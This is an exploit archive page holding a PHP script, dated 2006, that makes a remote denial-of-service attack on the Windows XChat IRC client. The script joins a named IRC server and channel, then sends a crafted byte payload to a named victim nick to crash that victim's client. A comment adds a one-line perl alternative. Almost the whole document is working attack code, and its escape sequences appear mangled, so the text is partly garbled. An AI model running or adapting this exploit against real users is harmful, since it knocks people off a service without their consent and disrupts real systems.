[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (php)
# Published : 2006-08-07
# Author : ratboy
# Previous Title : XChat <= 2.6.7 (win version) Remote Denial of Service Exploit (perl)
# Next Title : libmikmod <= 3.2.2 (GT2 loader) Local Heap Overflow PoC
<?
# another way to test this with irssi/bitchx <below> /str0ke
# /exec -o perl -e 'print "x9xxF0x92x8Dx85xF1xA5x90xB4xF1x96x9Ex85xF1xA6x8DxA5xF1xB8xA5x85xF1xA7x95xA8x29xF2x95x95x82"'
?>
<?php
// XChat <= 2.6.7 Windows Remote Crash DoS by ratboy
// Tested on Windows SP1/SP2
// The following bug was tested on the XChat <= 2.6.7 on Windows SP1/SP2
//Stop the script timing out
set_time_limit(0);
//Set constants
define("SERVER", 'irc.enigmagroup.org');
define("PORT", 6667);
define("CHANNEL", "#enigmagroup"); //Set the channel the bot will join here
define("NICK", "ratbot"); //Set the bot's nick here
define("EXPLOIT", "x9xxF0x92x8Dx85xF1xA5x90xB4xF1x96x9Ex85xF1xA6x8DxA5xF1xB8xA5x85xF1xA7x95xA8x29xF2x95x95x82");
define("VICTIM", "ratboy");
$socket = socket_create(AF_INET,SOCK_STREAM,SOL_TCP); // Create the Socket
$fp = socket_connect($socket, SERVER, PORT); // Connect to the server
socket_write($socket,"USER ratboy ratboy ratboy :ratboyrn"); // Send the Username to the server
socket_write($socket,"NICK ".NICK." rn"); // Change our nickname
socket_write($socket,"JOIN ".CHANNEL." rn"); // Join the channel
while($data = @socket_read($socket,2046)) { //read the data
echo $data;
$cmd = explode(" ", $data);
if (strpos($data, "PING :")===0) {
socket_write($socket, "PONG :".substr($data, 6)."rn");
continue;
}
if($cmd[1] == "PRIVMSG"){ // Send the exploit right when the channel gets a message then stop the bot
socket_write($socket, "PRIVMSG ".VICTIM." :".EXPLOIT."rn");
socket_close($socket);
}
}
?>
# www.Syue.com [2006-08-07]